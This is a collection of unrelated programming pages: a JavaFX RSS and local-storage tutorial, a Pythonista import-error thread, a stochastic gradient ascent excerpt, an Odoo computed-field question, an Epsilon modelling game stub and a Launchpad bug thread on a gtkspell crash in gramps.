The first article in this series, What's New In JavaFX 1.2 Technology: New Layouts and Effects, introduced you to new layout classes such as ClipView, Flow, and Stack, and demonstrated how to use these classes within your applications. Unlike the many articles that concentrate on graphical user interface (GUI) features and application design in JavaFX technology, this article and the next will provide insight into the more technical features such as RSS and Atom tasks, local storage using JavaFX's built-in storage classes, and the use of JavaFX charts. RSSTask Class To provide a basic introduction to RSS in JavaFX technology, the example application created in this article, StockReader, will use the RSSTask class to get current prices of stock symbols that the user provides. There will be three different versions of the StockReader application as NetBeans projects, and each will demonstrate new features as the application becomes more robust. When the user closes the application, it will store the stock symbols that are in use by using the built-in Storage classes. This article and the next will cover the use of RSS and Atom tasks in much more detail, as well as the use of JavaFX charts and graphs to visually display the difference in stock prices as they change. To begin, we first located a source to provide the information that the application needs: current price, time, and date of a given stock symbol through an RSS feed. The source we chose is QuoteRSS.com. For this first example, the application will take a sequence of three stock symbols -- GOOG, AAPL, and MSFT -- that are provided in the Main file and stored in the model, and run an RSSTask for each. The RSSTasks will then print to the console the title of the item returned, which is simply the title of the RSS item. Later, the application will take the item.title string and cut out what is needed for the user interface (UI): the stock's price and the time and date of the update.
Take a look at the following code from the application's model, which uses the feed from QuoteRSS.com to gather information on a sequence of stock symbols.

public class StockReaderModel {
    // In this case, the FeedTask will be run as an RSSTask.
    var feedTask:FeedTask;
    // The stock symbols will be passed in via the UI and stored here.
    public var symbols:String[];
    // A function that will run a feed for each stock symbol
    public function startFeeds():Void {
        for (s in symbols) {
            println("Starting RSS for: {s}");
            feedTask = RssTask {
                // Note: The stock symbol is being passed into the URL using {s}.
                location: "{s}&frmt=0&Freq=0"
                interval: 30s
                onException: function(e) {
                    println("Exception is: {e}");
                    println("There was a feed error with {s}");
                }
                onChannel: function(channel) {
                    println("{channel.title}");
                }
                onItem: function(item) {
                    println("{item.title}");
                }
            }
            feedTask.start();
        }
    }
};

As shown in the preceding code, the variable symbols is a string sequence that holds the stock symbols for which the user wants to obtain feeds. These symbols will be hard-coded initially, but this article will later show you how to pass them in through UI elements. The startFeeds() function iterates over the sequence of stock symbols and runs an RSSTask for each. The stock symbol, {s}, is then passed into the location URL.

Each RSSTask uses the interval variable of 30s. This causes the RSSTask to run every 30 seconds, so the end user receives frequent updates to any changes in the stock price. The RSSTask class inherits onException, which is used in this application to print not only the exception that was received but also the stock symbol that caused the exception. This article will expand on more uses of the onException variable later. The other two variables used in the feed task are onChannel and onItem. For now, both print their object's title to the console to demonstrate the basic workings of the RSSTask.
The next example will demonstrate how to cut out the information provided in these strings and use them in UI elements. In order to pass in the stock symbols and run the RSSTasks, the example contains the following Main file:

import stockreader.model.StockReaderModel;

// This example uses the Singleton pattern.
var model = StockReaderModel.getInstance();
model.symbols = ["GOOG", "AAPL", "MSFT"];
model.startFeeds();

Running the Main file provides the console output shown in Figure 1. As the application continues to run, the feeds update every 30 seconds and print out their new item.title strings. Without any kind of user interface, however, the application is quite boring and does not have much use. Now, the StockReader will get a UI allowing users to define the stocks that they would like to watch. This article will also demonstrate the use of Java technology to "scrape out" the parts of the title string to be used in the UI. Table 1 provides an outline of the variables used in the StockReader example application.

As noted in the previous section, the information returned in the feed from QuoteRSS.com is one long string:

QuoteRSS.com: MSFT: 25.16 at 10:34am 9/21/2009

That is not very helpful if the application's user interface needs to use and display specific parts of that string to the end user. This is where combining the Java and JavaFX Script technologies comes in very handy. The following code is a function created to "scrape out" the elements needed for the StockReader application.
public function parseTitleString(inContent:String, symbol:String):String[] {
    def startTitle = "QuoteRSS.com: {symbol}: ";
    def endTitle = "";
    var begPos = 0;
    var endPos = 0;
    var retStr:String;
    var stockElements:String[];
    begPos = inContent.indexOf(startTitle) + startTitle.length();
    if (begPos >= 0) {
        endPos = inContent.indexOf(endTitle, begPos) - 1;
        retStr = inContent.substring(begPos);
    }
    stockElements = retStr.split(" ");
    return stockElements;
}

This code allows you to pass in the item's title -- for example, the long string at the beginning of this section -- then to skip over the URL and stock symbol at the beginning of the string, and to split the remaining elements in between each space. For instance, passing in the quote for that MSFT update of

QuoteRSS.com: MSFT: 25.16 at 10:34am 9/21/2009

would provide the following:

["25.16","at","10:34am","9/21/2009"]

Now that the application can break the information down to what it needs, a face-lift of the UI is in order, as shown in Figure 2. Each of the white squares in Figure 2 is a StockItemNode. Using the new layout class Tile, which was demonstrated in the previous article, the StockItemNodes are aligned horizontally and vertically in a table-like format, wrapping to a new row once the nodes reach the width of the Tile. In this example, the StockItemNode has its own data model, a StockItem, which is very simple:

package stockreader.model;

public class StockItem {
    public var stockSymbol:String;
    public var price:String;
    public var time:String;
    public var date:String;
}

At this point, you can modify the RSSTask from the previous section to do something other than print to the console. For each stock symbol in the model, the application will create a StockItem, as seen in the stockItems variable in the following code sample. Instead of running an RSSTask for each symbol, the code is modified to run for each StockItem.
The data returned from the RSSTask will be assigned to the StockItem variables shown in the previous code sample. Take a look at the model's new RSSTask:

public class StockReaderModel {
    var feedTask:FeedTask;
    public var symbols:String[];
    public var stockItems:StockItem[] = bind for (s in symbols) StockItem { stockSymbol: s };

    /**
     * A function that will run a feed for each stock symbol,
     * and create a StockItem data model for each.
     */
    public function startFeeds():Void {
        for (si in stockItems) {
            println("symbol is {si.stockSymbol}");
            feedTask = RssTask {
                location: "{si.stockSymbol}&frmt=0&Freq=0"
                interval: 60m
                onException: function(e) {
                    println("Exception is: {e}");
                    si.price = "{indexof si + 1}";
                    si.time = "Feed Error";
                    si.date = "Feed Error";
                }
                onChannel: function(channel) {
                    println("{channel.title}");
                }
                onItem: function(item) {
                    println("{item.title}");
                    si.price = parseTitleString(item.title, si.stockSymbol)[0];
                    si.time = parseTitleString(item.title, si.stockSymbol)[2];
                    si.date = parseTitleString(item.title, si.stockSymbol)[3];
                }
                onDone: function():Void {
                    feedTask.stop();
                }
            }
            feedTask.start();
        }
    }
};

Note that the interval variable in the code sample has been changed to 60m, 60 minutes. You must assign a value to this variable in order for the RSSTask to work properly. In this case, it is not desirable that the feed tasks run continually, because the stocks themselves are not updated at specific intervals. Therefore, it would make more sense to have the user "refresh" the stocks when desired. Because the interval variable must be set, this application uses a large time interval of 60 minutes and stops the feed, feedTask.stop();, in the RSSTask's onDone event handler. But the application becomes much more useful if the end user is able to specify which stocks to watch. We added controls to allow the user either to choose from a list of predefined popular stocks or add some stocks by using a text box.
When the user adds a stock symbol, that symbol is added to the symbols variable in the model, and the startFeeds() function is called, adding a new StockItemNode to the UI. Figure 3 shows the open dialog box and controls.

Sometimes an error occurs in the RSS feed. As noted in the previous section, there are many uses for the onException variable in the RSSTask. In this application, if the feed for a stock causes an error, we want to make sure that the user sees something, even if it is not the correct data. Look at the following snippet of code, and you'll notice that the StockItem's variables are still assigned something, but the update time and date now show "Feed Error." This way, the user knows that something is wrong.

onException: function(e) {
    println("Exception is: {e}");
    si.price = "{indexof si + 1}";
    si.time = "Feed Error";
    si.date = "Feed Error";
}

The StockReader application now has a UI that allows the user to add and delete stocks, and to update the stocks using the refresh button. The next step is very important in this kind of application: local storage. The ability to store a user's data is an incredibly useful feature and, in many cases, a requirement. In this article's example application, users would get frustrated if they had to add the same stocks every time they ran the program. Therefore, locally storing the user's stocks and loading them on startup would make the application both easier to use and more effective.
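Before moving on to storage, an aside for readers following along in another language: the "scraping" performed by parseTitleString() can be sketched in a few lines of Python. This is a comparison sketch, not part of the article's code; the title format is taken from the QuoteRSS.com example above.

```python
def parse_title(title, symbol):
    """Strip the 'QuoteRSS.com: SYMBOL: ' prefix and split the rest on spaces."""
    prefix = "QuoteRSS.com: %s: " % symbol
    start = title.index(prefix) + len(prefix)
    return title[start:].split(" ")

print(parse_title("QuoteRSS.com: MSFT: 25.16 at 10:34am 9/21/2009", "MSFT"))
# → ['25.16', 'at', '10:34am', '9/21/2009']
```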
First, take a look at the saveProperties() function in the following code snippet:

var entry:Storage;

public function saveProperties():Void {
    println("Storage.list():{Storage.list()}");
    entry = Storage { source: "stockreader.properties" };
    var resource:Resource = entry.resource;
    var properties:Properties = new Properties();
    def symbolsTemp = for (symbol in symbols) "{symbol},";
    println("symbolsTemp looks like this: {symbolsTemp}");
    properties.put("symbolsTemp", "{symbolsTemp}");
    try {
        var outputStream:OutputStream = resource.openOutputStream(true);
        properties.store(outputStream);
        outputStream.close();
        println("properties written");
    } catch (ioe:IOException) {
        println("IOException in saveProperties:{ioe}");
    }
};

The Storage class contains two important variables that are used in the previous snippet: source and resource. The source variable is simply the path to the resource. In this example, it is a filename: stockreader.properties. The source can also be the absolute path to the resource, starting with /. A Resource is what will be stored on the platform, similar to a file. In the previous example, the stock symbols will be the resource.

A very important note is that the symbols used in the program are in a String array. When this sequence of strings is stored, it becomes a single string. For example, ["AAPL","MSFT","GOOG"] becomes "AAPLMSFTGOOG". In preparation for this, the constant symbolsTemp is defined, creating a comma-separated list of symbols: "AAPL,MSFT,GOOG". This will make the stored symbols easy to split apart when loaded, and it will ensure that there are no extra spaces or characters when the symbols are stored. Table 2 and Table 3 outline the variables and functions of the Storage and Resource classes that are used in the StockReader example application.

The Properties class is defined by the JavaFX 1.2 API as a "utility class for accessing and storing name/value pairs."
The example creates a new instance of the Properties class and creates a name/value pair for symbolsTemp. The put() function is passed a key:String, which is a name for the value to be stored, and a value:String, which in this case is symbolsTemp. Now that things are set up, it's time to try storing the data using the resource's openOutputStream(overwrite:Boolean):OutputStream function, which defines whether to overwrite existing data and returns an OutputStream. Use this line of code:

var outputStream:OutputStream = resource.openOutputStream(true);

This line provides a reference to the resource's OutputStream. Finally, the application calls properties.store(outputStream), which stores the symbolsTemp resource that we put away in the last paragraph, then closes the outputStream. Remember always to close any and all OutputStreams that you opened. Table 4 provides a list of useful variables and functions for the Properties class.

Obviously, we have to trigger the saveProperties() function at some point. The following two code samples demonstrate saving properties and exiting by using the close() and FX.addShutdownAction() functions.

closeButton = Button {
    text: "Exit Program"
    action: function():Void {
        model.saveProperties();
        stage.close();
    }
}

FX.addShutdownAction(function():Void {
    if (Alert.question("Save your stocks for next time?")) {
        model.saveProperties();
    }
})

Now that the symbols have been locally stored, they need to be loaded the next time that the user runs the application.
For this, a loadProperties() function was created:

public function loadProperties():Void {
    println("Storage.list():{Storage.list()}");
    entry = Storage { source: "stockreader.properties" };
    var resource:Resource = entry.resource;
    var properties:Properties = new Properties();
    try {
        var inputStream:InputStream = resource.openInputStream();
        properties.load(inputStream);
        inputStream.close();
        def symbolsTemp = properties.get("symbolsTemp");
        if (symbolsTemp != null and symbolsTemp.trim() != "") {
            symbols = symbolsTemp.split(",");
        } else {
            symbols = [];
        }
    } catch (ioe:IOException) {
        println("IOException in loadProperties:{ioe}");
    }
};

Notice that the beginning of this function is identical to the saveProperties() function. The application still needs a reference to the existing Storage, "stockreader.properties", the resource, and an instance of the Properties class in order to create an InputStream for loading the stored data. This time, the application will create a variable of type InputStream and assign it the resource's openInputStream() function, which returns an InputStream. It then calls properties.load(inputStream), which loads the name/value pair discussed earlier. Now that we have the comma-separated list of symbols, symbolsTemp, it's time to split them apart and assign them to the model's symbol variable, which is used by the RSSTasks.

Another important feature of data-storing applications is the ability to clear the user's data. The Storage class provides two functions for clearing the application's stored data: clear() and clearAll(). As their names suggest, clear() deletes a single resource from Storage, and clearAll() deletes all stored items or files. Following is a clearProperties() function that is called when the user clicks a "Clear Cache" button in the UI, which is shown in Figure 4.
public function clearProperties():Void {
    if (entry != null) {
        entry.clearAll();
        delete symbols;
        println("Properties cleared");
    }
};

Finally, the following code sample, located in the Main file, shows how the application invokes the loadProperties() function.

function run():Void {
    model.loadProperties();
    if (sizeof model.symbols > 0) {
        model.startFeeds();
    }
    stage = Stage {
        ...
        // ... EXTRA CODE REMOVED ...
        ...
    }
    FX.addShutdownAction(function():Void {
        if (Alert.question("Save your stocks for next time?")) {
            model.saveProperties();
        }
    })
}

First, the application loads the stored data. Then, as long as an empty string was not returned and model.symbols actually contains a symbol, the RSSTasks are started and the UI is created, including StockItemNodes for the stored symbols. The ability to store data locally can benefit the end user in ways other than storing stock symbols. For instance, some applications are designed so that a window opens to the size that it was when the user last closed the application. Storage makes this incredibly simple, as demonstrated in the book Pro JavaFX Platform.

Not only does JavaFX make it easy to invoke RSS feeds, the binding power of the platform easily allows you to update the UI with new information from feeds. Storing local data, an essential feature for most applications, is simple to integrate into your JavaFX code. The next article in this series will add another UI element to the StockReader example: JavaFX Charts.
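The save/load round trip above boils down to joining the symbol sequence into one comma-separated value, storing it under the symbolsTemp key, and splitting it back apart on load. Here is a minimal Python sketch of that idea; it is not the article's code, and the helper names are my own.

```python
import os

def pack_symbols(symbols):
    """['AAPL','MSFT'] -> 'AAPL,MSFT', mirroring symbolsTemp in the article."""
    return ",".join(symbols)

def unpack_symbols(stored):
    """Inverse of pack_symbols; an empty or blank value yields no symbols."""
    return stored.split(",") if stored and stored.strip() else []

def save_properties(path, symbols):
    # One name/value pair per line, like a Java-style properties file.
    with open(path, "w") as f:
        f.write("symbolsTemp=" + pack_symbols(symbols) + "\n")

def load_properties(path):
    if not os.path.exists(path):
        return []
    with open(path) as f:
        for line in f:
            key, _, value = line.rstrip("\n").partition("=")
            if key == "symbolsTemp":
                return unpack_symbols(value)
    return []
```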
http://www.oracle.com/technetwork/articles/javafx/v1-2-rsscharts-139204.html
How to install discord.py on Pythonista.

This post is deleted! (last edited by @ccc)

I need some assistance on something. I am almost done installing all the modules but I am confused on this. It says module "attr" has no attribute 's'.

Please provide the full error message, not just the last line.

Try:

import attr
print(attr.__file__)

@ccc here You can see the whole thing on this

I was asking for the text that is under the box with the two arrows in the upper right corner of the window. You can run @JonB's code in the Python REPL. We suspect that it will show you the path to a file in the local directory called attr.py and its presence is preventing Python from finding a second file with the same name in the package. If this is the case, then rename the local file and try again.
https://forum.omz-software.com/topic/7296/how-to-install-discord-py-on-pythonista
This article is based on Machine Learning in Action.

Introduction

Gradient Ascent uses the whole dataset on each update. This is fine with 100 examples but, with billions of data points containing thousands of features, it is unnecessarily expensive in terms of computational resources. An alternative to this method is to update the weights using only one instance at a time. This is known as Stochastic Gradient Ascent. Stochastic Gradient Ascent is an example of an on-line learning algorithm. This is known as on-line because we can incrementally update the classifier as new data comes in rather than all at once. The all-at-once method is known as batch processing.

Pseudocode for Stochastic Gradient Ascent would look like:

[code]
Start with the weights all set to 1
For each piece of data in the dataset:
    Calculate the gradient of one piece of data
    Update the weights vector by alpha*gradient
Return the weights vector
[/code]

The following listing contains the Stochastic Gradient Ascent algorithm.

Listing 1 Stochastic Gradient Ascent

[code]
def stocGradAscent0(dataMatrix, classLabels):
    m,n = shape(dataMatrix)
    alpha = 0.01
    weights = ones(n)
    for i in range(m):
        h = sigmoid(sum(dataMatrix[i]*weights))
        error = classLabels[i] - h
        weights = weights + alpha * error * dataMatrix[i]
    return weights
[/code]

Stochastic Gradient Ascent is very similar to Gradient Ascent except that the variables h and error are now single values rather than vectors. There also is no matrix conversion, so all of the variables are NumPy arrays.
To try this out, enter the code from listing 1 into logRegres.py and enter the following in your Python shell:

[code]
>>> reload(logRegres)
<module 'logRegres' from 'logRegres.py'>
>>> dataArr,labelMat=logRegres.loadDataSet()
>>> weights=logRegres.stocGradAscent0(array(dataArr),labelMat)
>>> logRegres.plotBestFit(weights)
[/code]

After executing the code to plot the best-fit line, you should see something similar to figure 1. The resulting best-fit line is OK but certainly not great. If we were to use this as our classifier, we would misclassify one-third of the results.

One way to look at how well the optimization algorithm is doing is to see if it is converging. That is, are the parameters reaching a steady value, or are they constantly changing? I have taken the Stochastic Gradient Ascent algorithm in listing 1 and modified it to run through the dataset 200 times. The weights were then plotted in figure 2.

Figure 2 shows how the weights change in our simple Stochastic Gradient Ascent algorithm over 200 iterations of the algorithm. Weight 2, labeled X2 in figure 2, takes only 50 cycles to reach a steady value, but weights 1 and 0 take much longer. An additional item to notice from this plot is that there are small periodic variations, even though the large variation has stopped. If you think about what is happening, it should be obvious that there are pieces of data that don't classify correctly and cause a large change in the weights. We would like to see the algorithm converge to a single value rather than oscillate, and we would like to see the weights converge more quickly. The Stochastic Gradient Ascent algorithm of listing 1 has been modified to address the problems shown in figure 2, and this is given in listing 2.
Listing 2 Modified Stochastic Gradient Ascent

[code]
def stocGradAscent1(dataMatrix, classLabels, numIter=150):
    m,n = shape(dataMatrix)
    weights = ones(n)
    for j in range(numIter):
        dataIndex = range(m)
        for i in range(m):
            alpha = 4/(1.0+j+i)+0.01                           #1
            randIndex = int(random.uniform(0,len(dataIndex)))  #2
            h = sigmoid(sum(dataMatrix[randIndex]*weights))
            error = classLabels[randIndex] - h
            weights = weights + alpha * error * dataMatrix[randIndex]
            del(dataIndex[randIndex])
    return weights
#1 Alpha changes with each iteration
#2 Update vectors are randomly selected
[/code]

The code in listing 2 is similar to that of listing 1, but two things have been added to improve it. The first thing to note is in #1: alpha changes on each iteration. This damps the high-frequency oscillations that we saw in figure 2. Alpha decreases as the number of iterations increases, but it never reaches 0 because there is a constant term in #1. We need to do this so that, after a large number of cycles, new data still has some impact. If you are dealing with something that changes over time, you may want to let the constant term be larger to give more weight to new values. A second property of the decreasing alpha function is that it decreases by 1/(j+i), where j is the index of the pass through the dataset and i is the index of the example in the training set. This gives an alpha that is not strictly decreasing when j<<max(i). Avoiding a strictly decreasing step size is shown to work in other optimization algorithms, such as simulated annealing, as well.

The second improvement appears in #2. Here, we randomly select the instance to use in updating the weights, which reduces the periodic variations that we saw in figure 2. An optional argument to the function has also been added. If no third argument is given, then 150 iterations will be done.
However, if a third argument is given, it will override the default. If you compare figures 2 and 3, you will notice two things. The first is that the coefficients in figure 3 do not show the regular motion of those in figure 2; this is due to the random example selection of stocGradAscent1(). The second is that the horizontal axis is much smaller in figure 3 than in figure 2, because stocGradAscent1() converges on a set of weights much more quickly; here, we use only 20 passes through the dataset.

Let's see this code in action. After you have entered the code from listing 2 into logRegres.py, enter the following in your Python shell:

[code]
>>> reload(logRegres)
<module 'logRegres' from 'logRegres.py'>
>>> dataArr,labelMat=logRegres.loadDataSet()
>>> weights=logRegres.stocGradAscent1(array(dataArr),labelMat)
>>> logRegres.plotBestFit(weights)
[/code]

You should see a plot similar to that in figure 4. The results are very similar to those of GradientAscent(), but far fewer calculations are involved. The default number of iterations is 150, but you can change this by adding a third argument to stocGradAscent1(), like:

[code]
>>> weights=logRegres.stocGradAscent1(array(dataArr),labelMat, 500)
[/code]

Summary

In this article, we learned about Stochastic Gradient Ascent and how to make modifications to it that yield better results.
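The listings above are Python 2 and depend on helper functions from the book (loadDataSet(), plotBestFit(), sigmoid()). As a self-contained sketch for readers on modern systems, here is a Python 3 / NumPy take on the modified algorithm of listing 2, run on synthetic linearly separable data. The dataset, function names, and the choice to index through the shrinking index list (so each pass visits every example exactly once) are my own, not the book's code:

```python
import numpy as np

def sigmoid(z):
    # clip to avoid overflow warnings for large |z|
    return 1.0 / (1.0 + np.exp(-np.clip(z, -500, 500)))

def stoc_grad_ascent(data, labels, num_iter=150, seed=0):
    """Python 3 sketch of listing 2: decaying alpha, random example order."""
    rng = np.random.default_rng(seed)
    m, n = data.shape
    weights = np.ones(n)
    for j in range(num_iter):
        indices = list(range(m))
        for i in range(m):
            # decays with j and i but never reaches 0 (the 0.01 constant)
            alpha = 4.0 / (1.0 + j + i) + 0.01
            # pop a random remaining index so each example is used once per pass
            pick = indices.pop(int(rng.integers(len(indices))))
            h = sigmoid(np.dot(data[pick], weights))
            error = labels[pick] - h
            weights = weights + alpha * error * data[pick]
    return weights

# Synthetic, linearly separable data standing in for loadDataSet()
rng = np.random.default_rng(1)
X = rng.normal(size=(200, 2))
y = (X[:, 0] + X[:, 1] > 0).astype(float)
Xb = np.hstack([np.ones((200, 1)), X])  # bias column, as in the book
w = stoc_grad_ascent(Xb, y, num_iter=50)
accuracy = ((sigmoid(Xb @ w) > 0.5).astype(float) == y).mean()
print("training accuracy:", accuracy)
```

On separable data like this, the weights settle quickly and the training accuracy should be close to 1.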
https://javabeat.net/stochastic-gradient-ascent/
[8.0] Computed field with bulk write

In the official documentation, we have the following example for computed fields:

    total = fields.Float(compute='_compute_total')

    @api.depends('value', 'tax')
    def _compute_total(self):
        for record in self:
            record.total = record.value + record.value * record.tax

In the guidelines, we can read: "Be aware that this assignation will trigger a write into the database. If you need to do bulk change or must be careful about performance, you should do classic call to write."

My question is: how can we do the bulk change? Is it valid to add the decorator @api.multi over the compute function and do something like self.write()?

Hi Emanuel,

Yes, by using the decorator @api.multi you can write bulk records of the same model. If you are overriding the write method, you have to define the decorator @api.multi. This is the standard convention: we always use multi for write, because if the write method is already overridden somewhere in a custom module, it will raise a singleton error if you do not follow the multi API. The suggestion is to always use api.multi where write comes into the picture. Hope this will help.

Rgds, Anil.

Sorry, my question was not very clear. I wanted to know what we should do specifically for computed fields. Can we decorate the compute functions used in fields with @api.multi?

@Emanuel cino: Yes, when you decorate your computed field's method with api.multi, it will be triggered automatically when the records are loaded or when any change happens to any record of the same model.
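To illustrate the performance concern behind the question, here is a plain-Python sketch (hypothetical stand-in classes, not the real Odoo ORM) contrasting one write() per record, as a naive compute loop would do, with a single bulk write() over the whole recordset:

```python
WRITE_CALLS = 0  # stands in for database round trips

class RecordSet:
    """Toy stand-in for an ORM recordset; not the real Odoo API."""
    def __init__(self, records):
        self.records = records

    def write(self, vals):
        """One call updates every record in the set, like ORM write()."""
        global WRITE_CALLS
        WRITE_CALLS += 1
        for rec in self.records:
            rec.update(vals)

records = [{"value": 100.0, "tax": 0.1} for _ in range(3)]

# Per-record assignment, as in the compute method's loop:
for rec in records:
    RecordSet([rec]).write({"total": rec["value"] * (1 + rec["tax"])})
print("per-record write calls:", WRITE_CALLS)   # one round trip per record

# Bulk change: every record takes the same vals in a single call.
WRITE_CALLS = 0
RecordSet(records).write({"total": 100.0 * 1.1})
print("bulk write calls:", WRITE_CALLS)
```

Note that a bulk write is only possible when all records in the set receive the same values; when computed results differ per record, one common pattern is to group records by result and issue one write per group.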
https://www.odoo.com/forum/help-1/question/8-0-computed-field-with-bulk-write-87506
It's a cold winter night in Villa Emfatica. A group of people is scattered across the rooms of the villa, but not all of them are alive. The solution to the mystery hides in a model that conforms to the metamodel below. As you progress through the levels of the game, more details of the metamodel will be revealed to you. Use the Model Explorer to query the mystery model with EOL, answer the questions on the right, and find the murderer!

// We'll give you this one
Person.all.size().println();

@namespace(uri="murdercase", prefix="")
package murdercase;

class House {
	val Person[*] people;
}

class Person {
}
https://www.eclipse.org/epsilon/games/game.php?game=murdercase
[gutsy] gtkspell segfaults when trying to set the language on gtk.TextView

Bug Description

Binary package hint: gramps

susan@susan:~$ gramps
***MEMORY- Segmentation fault (core dumped)
susan@susan:~$

see bug 116870 glibc

By the way, my python was the newest version available on 15 June.

It's segfaulting in aspell like so:

(gdb) bt
#0 0xb67ed76d in delete_
#1 0xb6801260 in ?? () from /usr/lib/
#2 0x756d2e42 in ?? ()
#3 0xb6801d36 in ?? () from /usr/lib/
#4 0xb6801d30 in ?? () from /usr/lib/
#5 0x08854bcc in ?? ()
#6 0x00000000 in ?? ()

This is most likely to be the gtkspell problem. If you can reproduce the gramps crash, try running the code below in a terminal, without gramps. It should not crash if there's no bug. If this crashes, then it's a gtkspell bug.

$ python
>>> import gtk
>>> import gtkspell
>>> import locale
>>> lang = locale.
>>> if lang == None:
...     print "lang is None"
...     success = False
... else:
...     gtkspell.
...     success = True
...
>>> success
True

Sorry Alex, I'm getting that script failing in several ways, lots of syntax trouble. Can you re-write it, test it on your system, and load it as an attachment?

Thanks Duncan. It was meant to be typed in; it is only a few lines. If you want to cut/paste, here it is:

1. First start python
2. Run the stuff below

import gtk
import gtkspell
import locale
lang = locale.
if lang == None:
    print "lang is None"
else:
    gtkspell.

Thanks Alex, how's this: bad news?

duncan@ubuntu:~$ python
Python 2.5.1 (r251:54863, May 27 2007, 15:55:14)
[GCC 4.1.3 20070518 (prerelease) (Ubuntu 4.1.2-8ubuntu1)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import gtk
>>> import gtkspell
>>> import locale
>>> lang = locale.
>>> if lang == None: print "lang is None"
... else: gtkspell.
...
Segmentation fault (core dumped)
duncan@ubuntu:~$

... and the script crashed python2.5, which kicked apport into life and gave us bug report 122477. Anything useful there?

No. It's not bad news for gramps.
It clearly demonstrates the issue with the "gtkspell" python module. Guessing from my past experience with this on Debian, it is not because of the python bindings but rather in gtkspell itself. However, I am not 100% sure; it's just a guess.

Just a standard crash report -- I didn't run the script mentioned above.

I get the same Segmentation fault as Duncan. If Alex is right, and this is a gtkspell bug, where do we report it? Once it is reported, someone can link this bug to the gtkspell bug.

I don't think there's an "if" here. The python script is pretty short, and the only thing that could have crashed it is the "gtkspell" python module. This can be either a problem with the python bindings for gtkspell (package python- ) or a gtkspell library problem (package libgtkspell0). The sensible thing would be to re-assign this bug report to python-

I think the problem might be with aspell.

#strace gramps
...
access(
open("/
access(
open("/
access(
open("/
fstat64(15, {st_mode=
mmap2(NULL, 4096, PROT_READ|
read(15, "# Standard keyboard data file\n\nq"..., 4096) = 100
read(15, "", 4096) = 0
close(15) = 0
munmap(0xb6c16000, 4096) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Process 31893 detached

I don't know if this helps...

Can you try this script instead of gramps? Just run $ strace python test.py with the attached test.py file. This script has nothing to do with gramps and should crash just the same, which shows that this is not a gramps issue and should be dealt with by the gtkspell folks.

Here's the output on my machine, just updated. For some reason I couldn't get it written to a file, so I've lost some of the start of the output. Looks like the same crash to me.

Can we please drop the gramps thing now and work with the script? This issue just happened to cause gramps to crash too, but this is not a gramps problem.
The script demonstrates it clearly :-)

We need someone from MOTU to take this on: either getting it fixed or re-packaging the current version unhooked from gtkspell. I don't think we should wait much longer if GRAMPS is to make it into Gutsy. Anyone able to take this on?

Opened a bug at the GtkSpell page on SourceForge: http://

The problem is how this function is called. The GtkTextView is instantiated temporarily and is destroyed after the construction of the GtkSpell object, which triggers destruction of the relevant parts needed by set_language. I personally would consider the calling method wrong, but well. A solution is to bump the refcount of the textview in the GtkExtra python module (found in gnome-python- So an immediate fix would be to move the gtk.TextView() into a temporary variable instead. With that it works even with the version of python-gtkspell currently in the archives.

gtkspell is buggy in the sense that it exposes no way of gathering the information "is a spell checker available for this language"; gnome-python-extras is buggy because it does not increase the refcounter of the textview; and gramps was buggy because it tried to acquire the information in a bogus way. To fix the problem for real, libgtkspell should use a weak reference to the GtkTextView object, so that when the GtkTextView is destroyed, GtkSpell is notified and removes the reference.

gramps (2.2.8-1ubuntu2) gutsy; urgency=low

  [ Philipp Kern ]
  * Work around a bug in gnome-python-extras which caused a deallocation
    of the TextView in the check if a spell checker is present. (LP: #120569)

  [ Scott Kitterman ]
  * Corrected XSBC-Original-
  * Moved debhelper from Build-Depends-Indep to Build-Depends to satisfy lintian
  * Bumped standards version to 3.7.2 without further change

 -- Scott Kitterman <email address hidden>  Tue, 25 Sep 2007 12:49:53 -0400

That's not a gnome-python-extras bug.

So I've worked around the issue in Gramps, but the fundamental problem remains.
I'd appreciate it if someone who understands Gnome would figure out which is the correct upstream to point fingers at.

It's like I said in comment 25: libgtkspell should be fixed. It's rather simple to fix using the g_object_weak_ref API, but I don't have time.

I am not an expert, but I do think this is a gnome-python-extras bug. A python object should live as long as there are any references held to it. In this case the Spell object still holds a reference to the TextView object, so the Spell object should increase the reference counter on the TextView. The "C" GtkSpell itself is not designed to live without a corresponding TextView (gtkspell_detach even destroys the GtkSpell "C" object). One could argue about the approach used in gtkspell, but as of now most of the functions depend on the view. The change suggested by Gustavo Carneiro would make gtkspell more robust against such situations, but I think it's a bigger change. In the test script above, if done correctly, the TextView would be destroyed automatically when the GtkSpell object is destroyed. After the last line there is no reference held to the GtkSpell object anymore, and the GC would destroy them both.

Philipp Kern: I would be interested in your code that tried to fix the issue in gnome-python-

Is this bug related to bug #261596?

Why is this bug still stuck on 'Fix released' and not actually committed?
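The object-lifetime problem described in these comments can be demonstrated without GTK at all. Below is a pure-Python analogue (the TextView and Spell classes are toy stand-ins, not the real bindings): Spell keeps only a weak reference to its view, mimicking the unowned C pointer inside libgtkspell, so passing a temporary TextView lets it be collected out from under the Spell object:

```python
import weakref

class TextView:
    """Toy stand-in for gtk.TextView."""
    def get_buffer(self):
        return "buffer"

class Spell:
    """Toy stand-in for gtkspell.Spell: holds only a weak reference,
    like the unowned C pointer in libgtkspell."""
    def __init__(self, view):
        self._view = weakref.ref(view)

    def set_language(self, lang):
        view = self._view()
        if view is None:
            # the real C library dereferenced the dead pointer and segfaulted
            raise ReferenceError("TextView already destroyed")
        return (view.get_buffer(), lang)

# Passing a temporary: the TextView loses its last strong reference as
# soon as the constructor returns, so set_language finds it gone.
crashed = False
try:
    Spell(TextView()).set_language("en_US")
except ReferenceError:
    crashed = True
print("crash analogue triggered:", crashed)

# Workaround from the comments: keep the view in a variable so it
# outlives the set_language call.
view = TextView()
result = Spell(view).set_language("en_US")
print("workaround result:", result)
```

This mirrors the suggested fix exactly: either the caller keeps a strong reference alive (the gramps workaround), or the library is made robust against the view disappearing (the weak-reference notification proposed for libgtkspell).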
Thanks for the report, Susan Cragin.

Sadly, I can only confirm that it is fixed in oneiric, since that is what I have now and I just checked. But it appears to be fixed. I did use gramps last year and had no trouble with it, so I assume it has been fixed for some time.

I'd say safe to say fixed in Natty.

I should say, I know that gramps works. If the fix worked by removing gtk-spell, then gtk-spell could still have problems, and I wouldn't know about them. But I suspect it's fixed because I have other programs that use gtk-spell and have had no problems.

I also saw the following information in the terminal I started gramps from:

/usr/share/gramps/Spell.py:53: GtkWarning: gtk_text_view_get_buffer: assertion `GTK_IS_TEXT_VIEW (text_view)' failed
  Spell(gtk.TextView()).set_language(lang)
